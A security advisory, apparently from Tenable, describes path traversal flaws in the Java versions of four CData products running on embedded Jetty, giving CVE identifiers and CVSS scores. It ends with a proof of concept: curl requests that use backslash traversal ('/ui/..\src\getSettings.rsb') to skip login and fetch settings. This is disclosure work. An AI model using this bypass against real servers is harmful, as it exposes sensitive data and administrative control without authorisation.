A researcher at Tenable discovered a path traversal vulnerability affecting the Java versions of multiple CData products when deployed using the embedded Jetty server, with varying impacts per product. The issue exists because of a combination of how the embedded Jetty server and CData servlets handle requests.
Technical Details
The path traversal can be leveraged as a result of the following conditions:
- The servlet mappings and security constraints laid out in each application's web.xml configuration file appear to be processed by Jetty in ways unintended by CData, allowing an attacker to bypass intended security constraint restrictions.
- Additionally, Jetty does not reject \ characters in URIs as other servers might (the same requests against the CData applications deployed on Tomcat are rejected as Tomcat does not allow \ characters in the URI), and the CData servlets still process the URIs properly.
- The CData applications lacked explicit session checks on a number of endpoints, allowing an attacker to leverage the path traversal to perform sensitive actions that would otherwise be restricted to an authenticated user.
CVE-2024-31848 - Path Traversal in CData API Server
Base Score: 9.8
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
A path traversal vulnerability exists in the Java version of CData API Server < 23.4.8844 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application.
CVE-2024-31849 - Path Traversal in CData Connect
Base Score: 9.8
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
A path traversal vulnerability exists in the Java version of CData Connect < 23.4.8846 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application.
CVE-2024-31850 - Path Traversal in CData Arc
Base Score: 8.6
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
A path traversal vulnerability exists in the Java version of CData Arc < 23.4.8839 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain access to sensitive information and perform limited actions.
CVE-2024-31851 - Path Traversal in CData Sync
Base Score: 8.6
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
A path traversal vulnerability exists in the Java version of CData Sync < 23.4.8843 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain access to sensitive information and perform limited actions.
Proof of Concept:
The simplest proof of concept which works for each product is accessing /src/getSettings.rsb which depending on the application can reveal sensitive data.
Regular request:
curl --head -H 'Host: 127.0.0.1:8080' -H 'Referer: http://127.0.0.1:8080/' 'http://127.0.0.1:8080/src/getSettings.rsb?@json'
HTTP/1.1 303 See Other
Date: Fri, 05 Apr 2024 17:09:21 GMT
Set-Cookie: apiserver_jsessionid=node01wx9hehp2d2kh3wlpx7p9au292.node0; Path=/; HttpOnly
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: http://127.0.0.1:8080/login.rst
Content-Length: 0
Server: Jetty(10.0.15)
With Path Traversal:
curl --head -H 'Host: 127.0.0.1:8080' -H 'Referer: http://127.0.0.1:8080/' 'http://127.0.0.1:8080/ui/..\src\getSettings.rsb?@json'
HTTP/1.1 200 OK
Date: Fri, 05 Apr 2024 17:11:20 GMT
X-Frame-Options: SAMEORIGIN
Content-Type: application/json;charset=utf-8
Content-Disposition: attachment; filename=GetSettings.json
Transfer-Encoding: chunked
Server: Jetty(10.0.15)